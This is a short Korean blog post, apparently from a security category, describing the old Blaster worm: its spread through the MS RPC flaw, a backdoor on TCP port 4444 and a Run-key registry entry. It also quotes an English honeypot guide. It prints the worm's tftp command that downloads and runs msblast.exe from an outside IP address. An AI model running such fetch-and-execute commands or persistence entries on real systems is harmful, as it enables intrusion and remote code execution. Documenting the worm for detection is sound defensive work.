이 바이러스는 MS RPC 취약성을 통해 전파되며, 웜에 감염 시 외부에서도 접속 가능한 백도어의 설치 및 재감염을 위한 네트워크 스캔으로 인해 서비스 거부공격이 발생한다.
웜에 감염되면 TCP 4444 port를 사용하는 백도어가 오픈된다.
바이러스의 전파를 위해 임의의 IP 주소를 생성한 후, RPC 취약성의 공격 트래픽을 발생시킨다.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\windows auto update = msblast.exe 생성
tftp -i 81.128.81.118 GET msblast.exe
start msblast.exe
msblast.exe
http://en.wikipedia.org/wiki/Blaster_(computer_worm)
http://www.keyfocus.net/kfsensor/help/AdminGuide/adm_RPC.php
웜에 감염되면 TCP 4444 port를 사용하는 백도어가 오픈된다.
바이러스의 전파를 위해 임의의 IP 주소를 생성한 후, RPC 취약성의 공격 트래픽을 발생시킨다.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\windows auto update = msblast.exe 생성
Blaster events
If attacked by the Blaster worm you will see the following two events in quick succession.
1. Port 135(MS RPC)
Received 1776 bytes containing the binary buffer overrun.2. Port 4444
Containing the following text:tftp -i 81.128.81.118 GET msblast.exe
start msblast.exe
msblast.exe
http://en.wikipedia.org/wiki/Blaster_(computer_worm)
http://www.keyfocus.net/kfsensor/help/AdminGuide/adm_RPC.php
'보안 > virus' 카테고리의 다른 글
| 악명높은 역대 바이러스 (0) | 2011.07.19 |
|---|---|
| Nimda worm (0) | 2011.04.15 |